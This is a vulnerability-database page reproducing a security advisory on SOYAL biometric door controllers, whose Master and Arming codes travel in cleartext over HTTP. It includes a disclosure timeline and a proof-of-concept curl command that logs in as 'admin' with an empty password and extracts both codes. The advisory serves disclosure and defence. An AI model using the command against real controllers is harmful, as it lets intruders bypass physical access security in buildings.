Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2021-5630
HistoryMar 18, 2021 - 12:00 a.m.

SOYAL Biometric Access Control System 5.0 Master Code Disclosure

2021-03-1800:00:00
Gjoko Krstic
zeroscience.mk
104
soyal technology
cleartext transmission
http traffic
master code
arming code
man-in-the-middle attack
physical security
vulnerability
disclosure
vendor response
zero science lab
exploit disclosure

AI Score

7

Confidence

Low

JSON

Title: SOYAL Biometric Access Control System 5.0 Master Code Disclosure
Advisory ID: ZSL-2021-5630
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 18.03.2021

Summary

Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings.

Description

The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controller’s Programming mode and bypass physical security controls in place.

Vendor

SOYAL Technology Co., Ltd - <https://www.soyal.com>

Affected Version

AR-727 i/CM - F/W: 5.0
AR837E/EF - F/W: 4.3
AR725Ev2 - F/W: 4.3 191231
AR331/725E - F/W: 4.2
AR837E/EF - F/W: 4.1
AR-727CM /i - F/W: 4.09
AR-727CM /i - F/W: 4.06
AR-837E - F/W: 3.03

Tested On

SOYAL Technology WebServer 2.0
SOYAL Serial Device Server 4.03A
SOYAL Serial Device Server 4.01n
SOYAL Serial Device Server 3.07n

Vendor Status

[25.01.2021] Vulnerability discovered.
[03.02.2021] Vendor contacted.
[08.02.2021] No response from the vendor.
[09.02.2021] Distributor responds and informs vendor.
[09.02.2021] Sent details to distributor.
[10.02.2021] Asked distributor for status update.
[11.02.2021] Vendor will patch the issue.
[18.03.2021] Public security advisory released.

PoC

soyal_code.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/198552&gt;
[2] <https://www.exploit-db.com/exploits/49676&gt;
[3] <https://cxsecurity.com/issue/WLB-2021030133&gt;
[4] <https://packetstormsecurity.com/files/161874&gt;
[5] <https://www.it.mk/bezbednost-mk-sajber-prostor-i-infrastruktura/&gt;
[6] <https://www.it.mk/istrazuvanje-mk-sajber-infrastruktura-soyal-biometric-access-control-system/&gt;
[7] <https://vulners.com/cve/CVE-2021-28265&gt;
[8] <https://nvd.nist.gov/vuln/detail/CVE-2021-28265&gt;

Changelog

[18.03.2021] - Initial release
[23.03.2021] - Added reference [1], [2], [3] and [4]
[15.04.2021] - Added reference [5] and [6]
[19.06.2021] - Added reference [7] and [8]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>SOYAL Biometric Access Control System 5.0 Master Code Disclosure


Vendor: SOYAL Technology Co., Ltd
Product web page: https://www.soyal.com.tw | https://www.soyal.com
Affected version: AR-727 i/CM - F/W: 5.0 
                  AR837E/EF   - F/W: 4.3
                  AR725Ev2    - F/W: 4.3 191231
                  AR331/725E  - F/W: 4.2
                  AR837E/EF   - F/W: 4.1
                  AR-727CM /i - F/W: 4.09
                  AR-727CM /i - F/W: 4.06
                  AR-837E     - F/W: 3.03

Summary: Soyal Access systems are built into Raytel Door Entry Systems
and are providing access and lift control to many buildings from public
and private apartment blocks to prestigious public buildings.

Desc: The controller suffers from a cleartext transmission of sensitive
information. This allows interception of the HTTP traffic and disclose
the Master code and the Arming code via a man-in-the-middle attack. An
attacker can obtain these codes to enter into the controller's Programming
mode and bypass physical security controls in place.

Tested on: SOYAL Technology WebServer 2.0
           SOYAL Serial Device Server 4.03A 
           SOYAL Serial Device Server 4.01n
           SOYAL Serial Device Server 3.07n


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5630
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php


25.01.2021

--


$ curl 'http://192.168.1.1/CtrlParam.htm' \
       -H 'Authorization: Basic YWRtaW46' | \
       grep -ni -B1 'masterCode\|armCode'

</p><td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
<td colspan="2"><input maxlength="6" name="masterCode" size="6" type="text" value="123456"/></td>
<td>Arming Code (4 Digital) </td>
<td colspan="2"><input maxlength="4" name="armCode" size="4" type="text" value="1234"/></td>
</body></html>

AI Score

7

Confidence

Low

JSON